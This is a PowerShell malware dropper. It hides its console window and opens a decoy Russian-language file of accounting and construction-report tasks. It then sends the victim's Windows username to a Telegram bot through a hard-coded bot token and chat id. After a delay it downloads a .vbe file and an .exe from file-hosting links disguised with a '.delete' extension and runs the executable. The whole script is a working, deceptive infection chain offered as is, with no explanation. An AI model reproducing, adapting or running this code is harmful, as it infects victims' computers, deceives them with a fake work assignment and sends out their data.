Add-Type -Name a0 -Namespace b0 -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,Int32 nCmdShow);'
$v0=[b0.a0]::GetConsoleWindow()
[b0.a0]::ShowWindow($v0,0)
$v1="Задание_для_бухгалтера_02отдела.txt"
$v2=Join-Path $env:LOCALAPPDATA $v1
$v3=@"
Задание_для_сотрудника:

Задание 1: Перенос данных в таблицу
    Откройте Список_материалов.txt.
    Создайте новый файл Материалы_отсортированные.xlsx.
    Перенесите все данные из текстового файла в таблицу, создав колонки: Наименование, Количество, Ед_изм, Стоимость_за_ед, Поставщик.
    Отсортируйте данные по столбцу Поставщик в алфавитном порядке.
    Сохраните файл.

Задание 2: Проверка и редактирование ведомости
    Откройте Ведомость_выполненных_работ.xlsx.
    Проверьте каждую запись на соответствие формату:
        Дата выполнения должна быть в формате ДД.ММ.ГГГГ.
        Количество должно быть числом больше 0.
    Исправьте ошибки, если найдёте.
    Добавьте новую колонку Примечания и для строк, где Количество > 100, напишите "Большой объем".
    Сохраните файл.

Задание 3: Создание отчетного документа
    Используйте данные из Акты_приемки.txt и Сотрудники_строители.xlsx.
    Создайте новый файл Отчет_по_актам.docx.
    Создайте таблицу с колонками: Номер акта, Дата, Объект, Сумма, Статус, Ответственный
    Перенесите данные из Акты_приемки.txt.
    Для каждого акта в колонке Ответственный укажите "ответственного из файла Сотрудники_строители.docx".
    Отсортируйте данные по Дате (от новых к старым).
    Сохраните файл.

Задание 4: Сводная таблица по поставщикам
    Откройте файл Материалы_отсортированные.xlsx.
    Создайте на новом листе сводную таблицу.
    В строках укажите Поставщик, в столбцах — Наименование, а в значениях — сумму по колонке Стоимостьзаед × Количество (итоговая стоимость).
    Добавьте фильтр по колонке Ед_изм.
    Сохраните изменения в том же файле.

Задание 5: Финальный отчет для руководства
    Используйте файлы Ведомостьвыполненныхработ.xlsx и Отчетпоактам.docx.
    Создайте новый документ Финальный_отчет_17.10.2025.docx.
    В начале документа добавьте титульный лист с названием: «Финальный отчет по строительным работам» и датой 17.10.2025.
    Вставьте таблицу с итоговыми данными:
        Общее количество выполненных работ.
        Общая сумма по актам.
        Количество актов со статусом «Не закрыт».
    В конце документа добавьте раздел «Комментарии», где укажите:
        Если есть строки с пометкой «Большой объем» — перечислите их номера.
        Если есть акты без ответственного — укажите их номера.
    Сохраните файл.

Дополнительное указание:
    Все итоговые файлы сохраните в папку Отчет_на_17.10.2025 и отправьте архивом .rar.
"@
$v3|Out-File -FilePath $v2 -Encoding UTF8
Invoke-Item $v2
$v4="8323167571:AAFEgqb4cAPmKNek-D6ioTvS634gRE0CuTo"
$v5="7063407604"
$v6=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$v7="The user's shortcut was enabled for user: "+$v6
$v8="https://api.telegram.org/bot"+$v4+"/sendMessage"
$v9=@{chat_id=$v5;text=$v7}|ConvertTo-Json
try{$v10=Invoke-RestMethod -Uri $v8 -Method Post -ContentType "application/json" -Body $v9}catch{}
Start-Sleep -Seconds 400
$v11="https://www.udrop.com/file/OcWQ/1446062403_house.delete"
$v12="1446062403_house.vbe"
$v13=[Environment]::GetFolderPath("LocalApplicationData")
$v14=Join-Path $v13 $v12
try{$v15=New-Object System.Net.WebClient;$v15.DownloadFile($v11,$v14)}catch{}
$v16="https://www.udrop.com/file/OcWP/1446062403_key.delete"
$v17="1446062403_key.exe"
$v18=Join-Path $v13 $v17
try{
    $v19=New-Object System.Net.WebClient
    $v19.DownloadFile($v16,$v18)
    Start-Process -FilePath $v18 -WindowStyle Normal
}catch{}
exit